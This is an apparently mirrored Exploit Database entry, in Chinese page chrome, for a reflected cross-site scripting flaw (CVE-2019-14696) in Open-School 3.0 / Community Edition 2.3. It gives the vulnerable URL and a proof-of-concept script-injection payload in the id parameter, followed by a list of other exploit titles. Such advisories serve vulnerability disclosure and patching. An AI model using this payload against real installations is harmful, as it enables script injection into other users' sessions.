Open-School 3.0 / Community Edition 2.3 – Cross-Site Scripting

Exploit Database
15 阅读

作者： Greg.Priest

日期： 2019-08-08
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/47212/

# Exploit Title: [title]
# Date: [2019 08 06]
# Exploit Author: [Greg.Priest]
# Vendor Homepage: [https://open-school.org/]
# Software Link: []
# Version: [Open-School 3.0/Community Edition 2.3]
# Tested on: [Windows/Linux ]
# CVE : [CVE-2019-14696]


Open-School 3.0, and Community Edition 2.3, allows XSS via the /index.php?r=students/guardians/create id parameter.

/index.php?r=students/guardians/create&id=1[inject JavaScript Code]

Example:
/index.php?r=students/guardians/create&id=1<script>alert("PWN3D!")</script><script>alert("PWN3D!")</script>

last Exploits
Open-School 3.0 / Community Edition 2.3 – Cross-Site Scripting的更多信息

Xangati – ‘/servlet/Installer?file’ Directory Traversal：
Liferay Portal 6.0.x < 6.1 - Privilege Escalation：
freediscussionforums 1.0 – Multiple Vulnerabilities：
BlogEngine 3.3 – XML External Entity Injection：
vTiger CRM 5.0.4 – Local File Inclusion：
Honeywell IP-Camera HICC-1100PT – Local File Disclosure：
Online Project Time Management System 1.0 – SQLi (Authenticated)：
MobPartner Counter – Arbitrary File Upload：